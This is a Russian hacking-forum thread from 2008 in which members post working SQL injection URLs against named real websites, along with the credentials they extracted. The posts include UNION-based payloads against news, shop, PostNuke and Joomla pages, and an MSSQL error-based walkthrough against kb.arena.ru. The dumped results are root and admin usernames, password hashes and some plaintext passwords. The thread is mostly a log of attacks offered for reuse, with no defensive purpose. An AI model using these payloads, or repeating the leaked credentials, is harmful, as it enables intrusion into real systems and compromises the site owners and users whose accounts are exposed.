Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.04.2008, 02:43
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
mccormick-intl.com
http://www.mccormick-intl.com/news_detail.php?nid=-1+union+select+name,password,3,4,5+from+users/*
Abi Harris
abi
abi@fifthelement.uk.com
4.0.13-nt:mccormi
acieap.com
http://www.acieap.com/news_detail.php?nid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()
),3,4/*
5.0.20-nt:annclark:annclark@localhost
annclarkassociates.com
http://www.annclarkassociates.com/news_detail.php?nid=-1+union+select+1,concat_ws(0x3a,version(),datab
ase(),user()),3,4/*
5.0.20-nt:annclark:annclark@localhost
admin
user
pass
afoundation.org.uk
http://www.afoundation.org.uk/greenlandstreet/details.php?id=-1+union+select+1,2,3,3,3,3,3,3,3,3,3,3,3
,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3/*
picoworld.com
http://www.picoworld.com/ourwork/details.php?id=31+union+select+1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,
0/*
petees.com
http://www.petees.com/details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5
,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
|
|
|
25.04.2008, 02:56
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Код:
http://rus.gflora.com/index.php?cmd=genus_body&genus_id=999999999/**/UNION/**/SELECT/**/concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11+from+mysql.user/*
root:*2825BE681C6102A9313382FB2405D76868BE5F32
Последний раз редактировалось bag; 25.04.2008 в 03:38..
|
|
|
|
25.04.2008, 09:25
|
|
Участник форума
Регистрация: 21.02.2008
Сообщений: 255
Провел на форуме:
975514
Репутация:
177
|
|
http://kb.arena.ru/kill.php?char=nickname'+UNION+SELECT+1,2--
кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена
|
|
|
|
25.04.2008, 10:34
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
imajo.ati
Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо
P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html
|
|
|
|
25.04.2008, 14:09
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от imajo.ati
кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена
imajo.ati
Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо
P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+table_name+from+information_schema.tables)--
Получаем имя первой таблицы, через not+in+() получаем имена остальных таблиц, но так как стоит фильтр, то имена нужно кодировать, очень помог в этом Universal char SQL encoder by [53x]Shadow!
Таким образом находим таблицу tLogins, колонки стандартные - login, password, id.
Выводим результат:
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(password+as+nvarchar)+from+tLogins)--
Логин и пароль сливаются, мускул ругается на +, ну впринцыпе и так покатит 
Так как все символы хэша не выводятся, сначала выводим первые 30, а потом с помощью команды substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length, выводим недостающие 2 символа:
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(substring(password,2,2)+as+nvarchar)+from+tLogins)--
Перебирать логины через where+id=... у меня не получилось, опять ругается мускул, альтернатива: +where+login+not+in(), логины опять же кодируем.
The End.
|
|
|
|
25.04.2008, 15:35
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Код:
http://www.whiznews.com/article.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,unhex(hex(concat_ws(0x3a,user,password))),4/**/from/**/mysql.user/*
root:*044222DB9218BC78AACACF7654EA2B53ABCA925F
Код:
http://www.sydneyroosters.com.au/news.php?ArticleID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4/**/from/**/mysql.user/*
root:*6CBD12C8F805CFADB394E65458C4D9664F1866C6
cms_admin:378b243e220ca493
testing1:4ab87db330cd6bd5
root:*019BBA7CE94D4959118549E98F475D38EA733DA5 - хз откуда второй root
Код:
http://www.chipdesignmag.com/display.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,unhex(hex(concat_ws(0x3a,user,password))),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/mysql.user/*
root:35976e334a7a830f
webadmin:48833ef87081f3cd
Код:
http://aainnovators.com/CMS/modules/wfsection/article.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/from/**/mysql.user+limit+0,1/*
admin:47fb196942cea04a
Код:
http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12/**/from/**/mysql.user/*
root:49c206e707168c98
Код:
http://www.prowrestlingfans.com/inc/printArticle.php?articleID=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11/**/from/**/mysql.user/*
root:*FA3D9981B584530E38A1BEB14DB9B74CB19FE4AE
Код:
http://www.snegohod-buran.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password)/**/from/**/mysql.user+limit+1,1/*
5fb4ffc22deb3e8c:vavaha
Код:
http://www.bike.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user,password),4/**/from/**/mysql.user+limit+0,1/*
root:: |
|
|
|
25.04.2008, 16:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Имена, логины и пассы админов в открытом виде:
http://la2.ru/events/tournament/?id='%20union%20select%20name,concat(login, ':', pass)%20from%20admins/*
Админка тут: http://la2.ru/admin (у всех админов разные права)
|
|
|
|
25.04.2008, 19:27
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Postnuke Mod PostSchedule SQL Vuln
Код:
http://www.cpxsports.com/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
cpxAdmin:4fbf5fbba0800c1c0b6b7a33ff88155f
Код:
http://www.psp-vault.com/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
zmcnulty:ebf2de34b9c2b48b4abf5554816eb872
Код:
http://www.exactas.org/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
janus:bbcf33804c68e36630f938010413be58
Код:
http://www.lasvanskadolina.net/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
yadranko:cf9df8b725f3cd7607f30927a18d0bb2
yadranko:h5555yangtze
Код:
http://www.aifonline.it/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
adminworm:6730d9c3a47d9229d98cab97f2ddd089
Код:
http://www.frisktigers.no/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
Admin:0eb7e1f71974d5e5ae01a801d9395dfb
Admin:iceman
Код:
http://www.kaeferteamuenchen.de/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
hkoerber:5a3fc01488cb3a9e6e2ef4f87bb9daef
Код:
http://www.ungmor.dk/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
Admin:3b353f8d757cdf65c913f2711df7734a
Код:
http://www.wpi.pl/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
wpi:6141afd4bec62ee61428cf9cef93c08f
Joomla (com_filiale)
Код:
http://www.brustart.be/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users
http://www.gimb.be/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users
|
|
|
|
25.04.2008, 20:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Поля в таблице Passwords
http://la2.ru/events/tournament/?id=-1'+union+select+column_name,2+from+information_sch ema.columns+where+table_name='passwords'/*
Окончательный список учёток и ниипёт:Р (Мошь надо кому было я хз,админки не тру  )).Вот ток XSS там валется куча(или одна бальшая),так шо будьте бдительны:Р
http://la2.ru/events/tournament/?id=-1'+union+select+concat_ws(0x3a,pw_id,pw_account,pw _pass,pw_email),2+from+passwords/* |
|
|
|
25.04.2008, 23:46
|
|
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487
Репутация:
46
|
|
nerdpics.net
http://www.nerdpics.net/view.php?id='1
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9--
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6,7,8,9--
nerdpics@localhost:nerdpics:5.0.38-Ubuntu_0ubuntu1-log
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(table_schema,0x3a,ta ble_name,0x3a,column_name),3,4,5,6,7,8,9+from+info rmation_schema.columns+where+column_name+LIKE%20/**/0x257061737325/**/--
user:User:Password
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
